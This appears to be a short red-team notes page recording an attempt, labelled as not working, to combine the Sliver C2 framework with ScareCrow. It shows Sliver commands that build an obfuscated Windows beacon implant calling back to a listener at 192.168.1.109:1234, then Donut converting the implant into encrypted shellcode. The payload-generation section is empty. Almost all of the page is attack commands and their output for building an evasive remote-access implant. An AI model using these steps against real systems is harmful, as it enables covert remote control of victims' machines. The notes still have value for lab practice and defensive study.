Sliver + ScareCrow (Does not Work)

Create beacon

sliver > generate beacon --http 192.168.1.109:1234 --os windows

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 17s
[*] Implant saved to /home/Intrusionz3r0/Documents/Sliver/ARBITRARY_ATHLETICS.exe

sliver > http --lhost 192.168.1.109 --lport 1234 

[*] Starting HTTP :1234 listener ...
[*] Successfully started job #2

sliver >  

Generating the shellcode

 ~/Documents/Tools/donut/donut -i /home/Intrusionz3r0/Documents/Sliver/ARBITRARY_ATHLETICS.exe -b 1 -e 3 --output rev.bin

  [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "/home/Intrusionz3r0/Documents/Sliver/ARBITRARY_ATHLETICS.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : none
  [ PE Headers    : overwrite
  [ Shellcode     : "rev.bin"
  [ Exit          : Thread

Generating the payload

Last updated